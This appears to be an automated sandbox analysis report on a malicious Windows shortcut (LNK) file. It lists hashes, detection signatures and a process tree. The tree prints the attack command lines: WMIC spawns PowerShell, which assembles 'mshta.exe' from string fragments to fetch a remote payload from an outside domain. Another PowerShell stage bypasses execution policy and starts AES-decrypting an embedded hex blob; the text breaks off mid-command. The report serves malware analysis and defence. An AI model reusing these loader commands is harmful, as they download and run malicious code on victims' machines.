Edit tour
Windows
Analysis Report
7A2lfjTYNf.lnk
Overview
General Information
Sample name: | 7A2lfjTYNf.lnkrenamed because original name is a hash value |
Original sample name: | 767810929a7b0dddecaad84a15aed733.lnk |
Analysis ID: | 1579758 |
MD5: | 767810929a7b0dddecaad84a15aed733 |
SHA1: | 529f0a59889968b60a992452e3d3bd876a7a02bc |
SHA256: | 295fae2f581e04308ae737dd0ee934da80099da2d9b3e90d7d907a57265b2a91 |
Tags: | lnkuser-abuse_ch |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- WMIC.exe (PID: 4148 cmdline:
"C:\Window s\System32 \Wbem\wmic .exe" proc ess call c reate "pow ershell -w 1 powersh ell -Comma nd ('ms' + 'hta' + ' .exe ' + ' https://ti ffany-care ers.com/gh epduy1325' )" MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 3984 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5412 cmdline:
powershell -w 1 powe rshell -Co mmand ('ms ' + 'hta' + '.exe ' + 'https:/ /tiffany-c areers.com /ghepduy13 25') MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1220 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6540 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " mshta.exe https://ti ffany-care ers.com/gh epduy1325" MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 5172 cmdline:
"C:\Window s\system32 \mshta.exe " https:// tiffany-ca reers.com/ ghepduy132 5 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 672 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop $dd g = '4734F 167E688B71 2E3D248343 D2E8F27F45 EFEB66CEF3 3E5F71E91F 4D577D03D3 07A3816965 837CD19178 7DF5ED8832 3F20D1C694 4C9100F6D0 44DB74B456 38F201D8BA E55A1DE539 BF3C012438 184FFECF2A 18AA75A38B 5FA2B30E37 75A6870035 9403C96690 A310E0FA61 DE6143A7A4 71CABD4AE7 08C72CF84B 7A1DC559F9 DCF0AABDD0 3FCA457629 03F51468BE F8488494E7 B7429432A3 A1BAEDBF48 33DEEA7078 1E018E4DFB 87CD05CEA8 267DFEEC57 474934D2E7 2FED942DC3 B6E04D01F8 2804DECEF1 3DC95D9F76 B95330BE65 2C3F5ECAB2 1E4D674502 85F38D92BE 31580C4E73 6177BF7147 4B83457639 E9C2881131 387C24401F 97A86AE28E F1CFA3564C F1974B4ACC 0F6695257F A23A2DDB11 745C35D97B 3064A0BAAF 7A97272149 C51840237C A06689453D 6A5F8B4667 8E80116729 59BFCB6DFD 142A3ED66A DE572299E4 42A73D667D F9462BE962 9070631121 1F2CE31646 E4040EBF2F 7AA2CB9DC7 FCF0E3D677 62E76457BA A609917136 F01E489A97 E9A7FB17C6 965F15CFF5 0FF5637D62 983F02A426 2193FDA98C 9A16EF2DA9 1F27193760 578614D5E2 613AC07AC1 CCB5EF6F58 7BC781DF31 F55B65181C 86F562B2BD 2A35461CAC 5C101B2121 4506A52C17 834FA44C6E 0DEF1A1E9C B0715D9313 5D5BBF09E6 FCCE528E1D A3761E0A1F 265D5F0FB3 FA2E21AC77 0F6F27CC1E C289352FC3 5A8C7DE18C 442B194FDC FA10DB3DA7 CDE32FD840 3F449D8FC7 5BE84A071B 70C8F55441 57502E7B20 71633BA5B9 D659AB9028 E480647AA8 FE41712E40 CDB4E6A26F 3268BFCF26 F9072B471B 8C282387E4 DBA4EBC936 09965409C1 A65C0C57DF 0CE49EC876 F91C5A9638 6BD60817F7 8D48A9D014 8412611DA9 639CF98343 09BE5DACA4 32F3ACBDFA 219E5B95B2 6C009CFC00 CF54BE1542 20779009DD C479CBDFEB 32FC40336C C86D179FF4 4CD5B390F9 41A50D06D5 2FAFC8F32D B72C350550 2F57C9EAA8 B71200A218 380D35F04E DC8E95B91F A86829B451 0AD91625BB E54DB1D323 7B08832E5C 8289753B1D 32B208E9E6 AA7E281982 490307DB69 35EA25109C 185FC16562 5387C55175 929D993B0A 9A3B1022C2 40A5ACB043 1E98C81D66 C70D1DC29B 7F9909E651 5937CDB3D2 83F4B12B4C 4D6E3F28F0 B7F5FD07BA 8EDC2B2815 8165A3FB91 BF281D1C32 0E33D3C8D2 5C1ABC674A B74EA1BE51 CF9A35EC73 C41528008D 4E8200333F AB1BFEDC6C 324ED62E66 7038A747AA 71059CF2CF 52ED743040 19637D8344 65D06062AA A679880D48 6BEED29E51 CBB32E274D 08CF418E16 AC10216BB6 20E504A77D 4771DF7571 7D83FEB1DA 9EA2224B0A B6051F81C3 5169397369 EDE2B5FCAD 429BA6B5E9 3A03CD2128 D91B05F33C 31AA36E6F1 6AFEB422B8 69409A0439 87E74028E9 9F3553B4AC 0943C7347D BDB9818608 468516E754 F4271494E6 9516251434 56D';funct ion yVE ($ UZpVPhOy){ return -sp lit ($UZpV PhOy -repl ace '..', '0x$& ')}; $foocSK = yVE($ddg.S ubString(0 , 2016));$ vAM = [Sys tem.Securi ty.Cryptog raphy.Aes] ::Create() ;$vAM.Key = yVE($ddg .SubString (2016));$v AM.IV = Ne w-Object b yte[] 16;$ MnEAtBA = $vAM.Creat eDecryptor ();$QXykJ = [System. String]::n